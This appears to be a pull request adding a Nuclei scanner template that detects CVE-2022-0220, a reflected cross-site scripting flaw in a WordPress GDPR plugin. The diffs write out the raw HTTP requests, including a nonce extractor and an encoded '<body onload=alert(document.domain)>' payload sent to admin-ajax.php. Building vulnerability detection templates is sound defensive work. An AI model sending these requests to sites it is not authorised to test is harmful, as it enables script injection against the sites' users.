### PR TITLE
Create CVE-2022-0220.yaml

### DIFF
--- a/cves/2022/CVE-2022-0220.yaml
+++ b/cves/2022/CVE-2022-0220.yaml
@@ -4,36 +4,41 @@ info:
   name: WordPress GDPR & CCPA < 1.9.27 - Unauthenticated Reflected Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: The check_privacy_settings AJAX action of the WordPress GDPR WordPress plugin before 1.9.27, available to both unauthenticated and authenticated users, responds with JSON data without an "application/json" content-type. Since an HTML payload isn't properly escaped, it may be interpreted by a web browser led to this endpoint. Javascript code may be executed on a victim's browser. Due to v1.9.26 adding a CSRF check, the XSS is only exploitable against unauthenticated users (as they all share the same nonce)
-  reference: https://wpscan.com/vulnerability/a91a01b9-7e36-4280-bc50-f6cff3e66059
-  tags: cve,cve2022,wordpress,wp-plugin,xss
+  description: |
+    The check_privacy_settings AJAX action of the WordPress GDPR WordPress plugin before 1.9.27, available to both unauthenticated and authenticated users, responds with JSON data without an "application/json" content-type. Since an HTML payload isn't properly escaped, it may be interpreted by a web browser led to this endpoint. Javascript code may be executed on a victim's browser. Due to v1.9.26 adding a CSRF check, the XSS is only exploitable against unauthenticated users (as they all share the same nonce)
+  reference: 
+    - https://wpscan.com/vulnerability/a91a01b9-7e36-4280-bc50-f6cff3e66059
+  tags: cve,cve2022,wordpress,wp-plugin,wp,xss
 
 requests:
   - raw:
       - |
+        GET /wp-admin HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
         POST /wp-admin/admin-ajax.php HTTP/1.1
         Host: {{Hostname}}
-        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
-        Accept-Language: en-GB,en;q=0.5
-        Accept-Encoding: gzip, deflate
         Content-Type: application/x-www-form-urlencoded
-        Connection: close
-        Upgrade-Insecure-Requests: 1
 
-        action=check_privacy_settings&settings%5B40%5D=40&settings%5B41%5D=%3cbody%20onload%3dalert(1)%3e&nonce=XXXX
+        action=check_privacy_settings&settings%5B40%5D=40&settings%5B41%5D=%3cbody%20onload%3dalert(document.domain)%3e&nonce={{nonce}}
 
-    matchers-condition: and
+    redirects: true
+    max-redirects: 2
+    req-condition: true
     matchers:
-      - type: status
-        status:
-          - 200
+      - type: dsl
+        dsl:
+          - "contains(all_headers_2, 'text/html')"
+          - "status_code_2 == 200"
+          - "contains(body_2, '<body onload=alert(document.domain)>')"
+        condition: and
 
-      - type: word
-        part: header
-        words:
-          - "text/html"
-
-      - type: word
+    extractors:
+      - type: regex
+        name: nonce
         part: body
-        words:
-          - "<body onload=alert(1)>"
+        group: 1
+        regex:
+          - 'nonce":"([0-9a-z]+)'
+        internal: true

--- a/cves/2022/CVE-2022-0220.yaml
+++ b/cves/2022/CVE-2022-0220.yaml
@@ -1,0 +1,39 @@
+id: CVE-2022-0220
+
+info:
+  name: WordPress GDPR & CCPA < 1.9.27 - Unauthenticated Reflected Cross-Site Scripting
+  author: daffainfo
+  severity: medium
+  description: The check_privacy_settings AJAX action of the WordPress GDPR WordPress plugin before 1.9.27, available to both unauthenticated and authenticated users, responds with JSON data without an "application/json" content-type. Since an HTML payload isn't properly escaped, it may be interpreted by a web browser led to this endpoint. Javascript code may be executed on a victim's browser. Due to v1.9.26 adding a CSRF check, the XSS is only exploitable against unauthenticated users (as they all share the same nonce)
+  reference: https://wpscan.com/vulnerability/a91a01b9-7e36-4280-bc50-f6cff3e66059
+  tags: cve,cve2022,wordpress,wp-plugin,xss
+
+requests:
+  - raw:
+      - |
+        POST /wp-admin/admin-ajax.php HTTP/1.1
+        Host: {{Hostname}}
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+        Accept-Language: en-GB,en;q=0.5
+        Accept-Encoding: gzip, deflate
+        Content-Type: application/x-www-form-urlencoded
+        Connection: close
+        Upgrade-Insecure-Requests: 1
+
+        action=check_privacy_settings&settings%5B40%5D=40&settings%5B41%5D=%3cbody%20onload%3dalert(1)%3e&nonce=XXXX
+    
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: word
+        part: body
+        words:
+          - "<body onload=alert(1)>"

--- a/cves/2022/CVE-2022-0220.yaml
+++ b/cves/2022/CVE-2022-0220.yaml
@@ -8,6 +8,7 @@ info:
     The check_privacy_settings AJAX action of the WordPress GDPR WordPress plugin before 1.9.27, available to both unauthenticated and authenticated users, responds with JSON data without an "application/json" content-type. Since an HTML payload isn't properly escaped, it may be interpreted by a web browser led to this endpoint. Javascript code may be executed on a victim's browser. Due to v1.9.26 adding a CSRF check, the XSS is only exploitable against unauthenticated users (as they all share the same nonce)
   reference:
     - https://wpscan.com/vulnerability/a91a01b9-7e36-4280-bc50-f6cff3e66059
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-0220
   tags: cve,cve2022,wordpress,wp-plugin,wp,xss
 
 requests:

--- a/cves/2022/CVE-2022-0220.yaml
+++ b/cves/2022/CVE-2022-0220.yaml
@@ -21,7 +21,7 @@ requests:
         Upgrade-Insecure-Requests: 1
 
         action=check_privacy_settings&settings%5B40%5D=40&settings%5B41%5D=%3cbody%20onload%3dalert(1)%3e&nonce=XXXX
-    
+
     matchers-condition: and
     matchers:
       - type: status

--- a/cves/2022/CVE-2022-0220.yaml
+++ b/cves/2022/CVE-2022-0220.yaml
@@ -32,7 +32,7 @@ requests:
         dsl:
           - "contains(all_headers_2, 'text/html')"
           - "status_code_2 == 200"
-          - "contains(body_2, '<body onload=alert(document.domain)>')"
+          - "contains(body_2, '<body onload=alert(document.domain)>') && contains(body_2, '/wp-content/plugins/')"
         condition: and
 
     extractors:

--- a/cves/2022/CVE-2022-0220.yaml
+++ b/cves/2022/CVE-2022-0220.yaml
@@ -6,7 +6,7 @@ info:
   severity: medium
   description: |
     The check_privacy_settings AJAX action of the WordPress GDPR WordPress plugin before 1.9.27, available to both unauthenticated and authenticated users, responds with JSON data without an "application/json" content-type. Since an HTML payload isn't properly escaped, it may be interpreted by a web browser led to this endpoint. Javascript code may be executed on a victim's browser. Due to v1.9.26 adding a CSRF check, the XSS is only exploitable against unauthenticated users (as they all share the same nonce)
-  reference: 
+  reference:
     - https://wpscan.com/vulnerability/a91a01b9-7e36-4280-bc50-f6cff3e66059
   tags: cve,cve2022,wordpress,wp-plugin,wp,xss
 


### PR DESCRIPTION
## Description

The check_privacy_settings AJAX action of the WordPress GDPR WordPress plugin before 1.9.27, available to both unauthenticated and authenticated users, responds with JSON data without an "application/json" content-type. Since an HTML payload isn't properly escaped, it may be interpreted by a web browser led to this endpoint. Javascript code may be executed on a victim's browser. Due to v1.9.26 adding a CSRF check, the XSS is only exploitable against unauthenticated users (as they all share the same nonce)


